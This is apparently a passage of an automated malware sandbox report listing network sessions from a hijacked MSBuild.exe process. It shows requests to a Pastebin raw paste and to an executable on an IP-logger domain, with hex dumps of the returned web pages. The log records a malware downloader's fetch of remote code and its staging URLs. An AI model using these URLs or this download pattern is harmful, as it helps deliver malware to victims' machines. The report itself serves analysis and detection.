                    2024-09-16 19:22:23 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                    Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                    2024-09-16 19:22:23 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                    Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                    2024-09-16 19:22:23 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                    Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                    2024-09-16 19:22:23 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:23 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.649765104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:27 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:28 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4339b568e818ee-EWR
                    2024-09-16 19:22:28 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:28 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:28 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:28 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:28 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.649766188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:28 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:29 UTC902INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:28 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:28 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbyZqsPf66smadrJQZ3uMHj44QNIBD%2FidatwKikGDf5%2BB4mGVXt0Cn%2F6A4TwaNrMga1JuLbHKYLw2HCo7ecUuwLTRzPVKNTV9nfjxyo0q3%2BE2A4qtZtJD1I%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4339ba6e9d4332-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:29 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:29 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                    Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                    2024-09-16 19:22:29 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                    Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                    2024-09-16 19:22:29 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                    Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                    2024-09-16 19:22:29 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                    Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                    2024-09-16 19:22:29 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                    Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                    2024-09-16 19:22:29 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:29 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.649767104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:34 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:34 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4339dc1ea141ad-EWR
                    2024-09-16 19:22:34 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:34 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:34 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
